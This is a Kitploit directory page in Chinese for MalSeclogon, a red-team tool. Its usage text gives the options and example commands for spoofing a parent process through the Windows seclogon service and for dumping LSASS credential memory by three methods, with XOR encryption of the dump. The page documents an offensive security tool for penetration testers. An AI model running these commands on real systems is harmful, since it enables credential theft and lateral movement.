Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
MalSeclogon — 一个小工具,用于操作 Seclogon 服务 | Kitploit
工具/GitHubGitHub/antoniococo/malseclogon
权限提升内存取证漏洞利用横向移动后渗透利用红队
GitHubantoniococo/malseclogon

MalSeclogon

一个小工具,用于操作 Seclogon 服务

查看仓库
327494年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

MalSeclogon

一个用于操作Seclogon服务的小工具。

完整技术细节见:

  • https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-2.html
  • https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html

用法

root@kitploit:~
        MalSeclogon v0.2
        @splinter_code

Args:
-p Pid of the process to spoof the PPID through seclogon service
-d Dump lsass method
        1 = Dump lsass by using leaked handles
        2 = Dump lsass by using leaked handles and cloned lsass process
        3 = Dump lsass by stealing handle from seclogon. (Default)
-o Output path of the dump (default C:\lsass.dmp)
-c Commandline of the spoofed process, default: cmd.exe (not compatible with -d)
-k Xor key to encrypt the dump. Compatible only with -d 3. Allowed values 1-255. Default = 40.
-f Path to an encrypted dump file. This decrypt the dump. If no -k key are specified the default value is 40.

Examples:
- Run a process with a spoofed PPID:
        Malseclogon.exe -p [PPID] -c cmd.exe
- Dump lsass by using leaked handles:
        Malseclogon.exe -d 1
- Dump lsass by using leaked handles and cloned lsass process:
        Malseclogon.exe -d 2
- Dump lsass by stealing handle from seclogon using xor key 40:
        Malseclogon.exe -d 3 -o C:\lsass.dmp.xor -k 40
- Decrypt an lsass dmp file with the key 40:
        Malseclogon.exe -f C:\lsass.dmp.xor -k 40

构建说明

不要构建"Debug"或"x86"版本。使用这些构建生成的二进制文件无法正常工作。 应使用的正确构建是"Release x64"。

下载工具